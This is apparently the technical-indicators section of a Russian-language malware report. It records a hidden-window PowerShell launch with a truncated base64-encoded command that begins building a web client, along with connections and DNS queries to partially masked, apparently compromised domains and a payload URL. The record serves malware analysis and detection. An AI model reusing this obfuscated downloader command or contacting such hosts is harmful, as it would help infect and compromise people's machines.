Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEADMAXwBfAF8AMwA1AD0AKAAnAHcAXwA5ADQAJwArACcAXwAnACsAJwBfAF8AJwApADsAJABqAF8AMgAzAF8AXwBfAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAG0AXwBfADYAMQAxAD0AKAAnAG...
- 'ba##.##nrisetheme.com':80
- 'bu###tc.com.ua':80
- 'ba##.com.ar':80
- http://ba##.com.ar/wp-content/qs/
- DNS ASK ba##.##nrisetheme.com
- DNS ASK bi###de.com.br
- DNS ASK bu###tc.com.ua
- DNS ASK ba##.com.ar
- DNS ASK ad###design.ro
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEADMAXwBfAF8AMwA1AD0AKAAnAHcAXwA5ADQAJwArACcAXwAnACsAJwBfAF8AJwApADsAJABqAF8AMgAzAF8AXwBfAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAG0AXwBfADYAMQAxAD0AKAAnAG...' (со скрытым окном)